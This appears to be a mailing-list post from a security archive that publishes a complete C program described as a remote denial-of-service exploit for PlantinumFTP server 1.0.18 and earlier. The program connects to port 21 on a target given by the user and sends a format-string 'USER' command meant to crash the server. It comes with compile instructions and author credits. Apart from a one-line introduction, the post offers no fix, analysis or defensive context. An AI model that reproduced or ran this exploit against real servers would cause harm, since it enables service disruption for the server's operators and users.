<<< Date Index >>>     <<< Thread Index >>>

PlantinumFTP server <= 1.0.18 Remote DOS exploit




Here is simple exploit for PlantinumFTP server DOS bug.

/*
 * PlantinumFTP server <= 1.0.18 Remote DOS exploit
 * -------------------------------------------------
 * PlantinumFTP server exploit for Remote Denial of Service bug
 * in PlantinumFTP founded by ports.
 *
 * Coded by Exoduks - exoduks[at]gmail.com
 * HackGen Team - www.hackgen.org
 *
 * Compile: gcc -o pFTP_dos pFTP_dos.c
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 21

int main(int argc, char **argv)
{
    char buffer[50];
    char *host_ip;
    int mysock;
    struct sockaddr_in name;
    struct hostent *myhost;

    printf("\n PlantinumFTP server <= 1.0.18 Remote DOS exploit\n");
    printf(" -------------------------------------------------\n");
    printf(" Coded by Exoduks - exoduks[at]gmail.com\n");
    printf(" HackGen Team - www.hackgen.org\n");
    printf(" -------------------------------------------------\n");

    printf(" [+] Creating socket !\n");
    mysock = socket(PF_INET, SOCK_STREAM, 0);
    if (mysock == -1) {
        printf("[-] Socket error !\n");
        return 1;
    }

    host_ip = argv[1];

    if (host_ip == NULL) {
        printf(" [-] Host error ! - Usage: %s <ip/host> !\n\n", argv[0]);
        return 1;
    }

    myhost = gethostbyname(host_ip);

    name.sin_family = AF_INET;
    name.sin_addr = *((struct in_addr*) myhost->h_addr);
    name.sin_port = htons(PORT);

    printf(" [+] Connecting to target on port %d!\n", PORT);
    if (connect (mysock, (struct sockaddr*)&name, sizeof(struct sockaddr_in)) 
== -1) {
        printf(" [-] Connection error !\n");
        return 2;
    }

    printf(" [+] Sending exploit !\n");
    sprintf(buffer, "%s", "USER %s%s%s%s\r\n");
    write(mysock, buffer, strlen(buffer));
    printf(" [+] Exploit sent !\n\n");

    close(mysock);

    return 0;
}